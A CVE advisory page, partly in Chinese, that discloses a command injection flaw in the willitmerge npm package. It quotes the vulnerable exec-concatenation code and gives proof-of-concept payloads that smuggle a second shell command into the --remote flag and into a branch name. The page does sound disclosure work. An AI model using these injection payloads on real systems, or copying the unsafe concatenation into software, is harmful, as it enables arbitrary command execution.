CVE-2025-66219
willitmerge has a Command Injection vulnerability
描述
willitmerge describes itself as a command line tool to check if pull requests are mergeable. There is a Command Injection vulnerability in version `[email protected]`. Resources: * Project's GitHub source code: https://github.com/shama/willitmerge/ * Project's npm package: https://www.npmjs.com/package/willitmerge ## Background on exploitation Reporting a Command Injection vulnerability in `willitmerge` npm package. A security vulnerability manifests in this package due to the use of insecure child process execution API (`exec`) to which it concateanes user input, whether provided to the command-line flag, or is in user control in the target repository. ## Exploit ### POC 1 1. Install `willitmerge` 2. Run it with the following command ```sh willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel" ``` 3. Confirm the file `/tmp/hel` is created on disk ### GitHub-sourced attack vector [Lines 189-197](https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197) in `lib/willitmerge.js` pass user input controlled by repository collaborators into the git command: ```js var cmds = [ 'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref, 'git remote add ' + branch + ' ' + gitUrl, 'git pull ' + branch + ' ' + iss.head.ref, 'git reset --merge HEAD', 'git checkout ' + origBranch, 'git branch -D ' + branch, 'git remote rm ' + branch ]; ``` Users creating malicious branch names such as `;{echo,hello,world}>/tmp/c` This is a similar attack vector to that which was reported for the [pullit vulnerability (https://security.snyk.io/vuln/npm:pullit:20180214) # Author Liran Tal
如何修補 CVE-2025-66219
目前尚未發布修補版本。可考慮移除受影響套件,或參考下方連結中的上游建議。
- —未列出修補版本
CVE-2025-66219 正在被利用嗎?
低 — EPSS 為 0.3%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, <= 0.2.1